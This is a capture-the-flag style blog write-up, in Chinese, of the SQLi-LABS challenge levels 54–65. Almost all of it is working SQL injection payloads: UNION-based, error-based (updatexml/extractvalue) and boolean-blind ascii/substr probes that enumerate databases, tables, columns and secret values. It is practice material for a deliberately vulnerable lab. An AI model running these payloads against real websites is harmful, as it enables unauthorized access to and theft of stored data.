SQLi-LABS Page-4(Challenges)

Posted 2021-03-02 Michae1

Less-54 GET - challenge - Union - 10 queries allowed - Variation 1

get  union注入  变异

 ?id=1\'       //显示异常

?id=1\'%23   //显示正常，说明参数可能被 单引号 \'  闭合

?id=1\' order by 3%23    //显示正常

?id=1\' order by 4%23    //显示异常，所以 Union注入 有三个课显示位

?id=-1\' union select 1,2,3%23   //id要赋值为 -1 才能 运行后面 Union

 

 

 ?id=-1\' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23   //表名

 

 

  ?id=-1\' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=\'avnx1khkg5\'%23   //字段名

 

  ?id=-1\' union select 1,group_concat(concat_ws(0x7e,id,sessid,secret_HUW2,tryy)),3 from avnx1khkg5%23

 

 Less-55

?id=1\'       //显示异常

?id=1\'%23   //异常

?id=1)%23  //正常

?id=-1) union select 1,2,3%23

以后的步骤单引号改为括号，其他和54一样

Less-56

?id=1\')%23

?id=-1\') union select 1,2,3%23

Less-57

?id=1\'   //正常

?id=1"    //异常

?id=1"%23  //正常

?id=-1" union select 1,2,3%23

Less-58  报错注入

 extractvalue(1,concat(0x7e,(select database())))

 updatexml(1,concat(0x7e,(select database())))

?id=1\'

源语句

$sql="SELECT * FROM security.users WHERE id=\'$id\' LIMIT 0,1";

报错

\'\'1\'\' LIMIT 0,1\'             \'        \'   1\'    \'  LIMIT 0,1\' 

我现在才知道这个报错的结构

最外侧的是报错语句自带单引号，1’ 是我们输入的参数，包裹1\'是源语句自带的单引号

?id=1\'%23

显示正常

库名

?id=1\' and updatexml(1,concat(0x7e,database(),0x7e),1)%23

表名

?id=1\' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

字段名

?id=1\' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\'us0lety19j\'),0x7e),1)%23

 字段内容（最后一次机会，速度要快哦）

貌似，没有出来所有字段

?id=1\' and updatexml(1,concat(0x7e,(select group_concat(concat_ws(0x7e,id,sessid,secret_A32O,tryy)) from us0lety19j),0x7e),1)%23

Less-59

?id=1\'

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)%23

?id=1\' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

Less-60

?id=1"

?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)%23

?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

Less-61

?id=1\'

?id=1\')) and updatexml(1,concat(0x7e,database(),0x7e),1)%23

?id=1\')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

Less-62

?id=1\') and 1=1%23     //显示正常

?id=1\') and 1=2%23     //异常

?id=1\') and length(database())=11%23   //异常

?id=1\') and length(database())=10%23   //正常，库名长度为 10

?id=1\') and (select count(table_name) from information_schema.tables where table_schema=database())=1%23   //表的个数

?id=1\') and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=10%23   //表名的长度

?id=1\') and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=97%23   //表名

 

?id=1\') and (select count(column_name) from information_schema.columns where table_name=\'ahopefr76d\')=4%23   // 字段的个数

?id=1\') and ascii(substr((select column_name from information_schema.columns where table_name=\'ahopefr76d\' limit 0,1),1,1))=105%23  //字段名

 

?id=1\') and length((select secret_6XV7 from ahopefr76d))=24%23    //字段内容的长度

?id=1\') and ascii(substr((select secret_6XV7 from ahopefr76d),1,1))=110%23   //字段内容

后面 Less-63  64  65 语句都是一样的，只是符号不一样